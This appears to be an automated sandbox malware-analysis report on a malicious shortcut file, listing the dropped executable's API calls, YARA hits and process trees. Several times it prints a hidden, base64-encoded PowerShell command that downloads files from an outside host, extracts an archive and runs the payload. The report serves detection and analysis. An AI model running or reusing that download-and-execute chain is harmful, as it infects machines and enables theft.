Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A5F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_00A5F6C7

Source: C:\Users\user\AppData\Local\Temp\a.exe

5_2_00A5F45C

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A4A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

5_2_00A4A54A

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A79ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

5_2_00A79ED5

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 8024, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\a.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A54678: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

5_2_00A54678

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A41A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_00A41A91

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A4F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

5_2_00A4F122

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009FE0BE	5_2_009FE0BE
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A08037	5_2_00A08037
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A02007	5_2_00A02007
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009EE1A0	5_2_009EE1A0
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A1A28E	5_2_00A1A28E
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A022C2	5_2_00A022C2
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009E225D	5_2_009E225D
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009FC59E	5_2_009FC59E
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A6C7A3	5_2_00A6C7A3
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A1E89F	5_2_00A1E89F
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A5291A	5_2_00A5291A
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A16AFB	5_2_00A16AFB
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A48B27	5_2_00A48B27
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A0CE30	5_2_00A0CE30
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A751D2	5_2_00A751D2
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A17169	5_2_00A17169
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009E9240	5_2_009E9240
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009E9499	5_2_009E9499
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A01724	5_2_00A01724
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A01A96	5_2_00A01A96
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A07BAB	5_2_00A07BAB
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009E9B60	5_2_009E9B60
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A07DDA	5_2_00A07DDA
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A01D40	5_2_00A01D40

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\a.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: String function: 009FFD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: String function: 00A00DC0 appears 46 times

Source: Process Memory Space: powershell.exe PID: 8024, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.evad.winLNK@22/19@3/4

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A5410F GetLastError,FormatMessageW,

5_2_00A5410F

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4194F AdjustTokenPrivileges,CloseHandle,		5_2_00A4194F
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A41F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		5_2_00A41F53

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A55B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_00A55B27

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A6AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00A6AFDB

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A64089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

5_2_00A64089

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A53923 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00A53923

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\MixDep2025.xlsx

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3036:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt30vo2n.s55.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: S5dpmRJg30.lnk	Virustotal: Detection: 34%
Source: S5dpmRJg30.lnk	ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Documents\MixDep2025.xlsx"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe "C:\Users\user\AppData\Local\Temp\a.exe" C:\Users\user\AppData\Local\Temp\\P.a3x
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force"
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c python.exe logo.png
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe python.exe logo.png
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Documents\MixDep2025.xlsx"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe "C:\Users\user\AppData\Local\Temp\a.exe" C:\Users\user\AppData\Local\Temp\\P.a3x	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c python.exe logo.png	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe python.exe logo.png

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
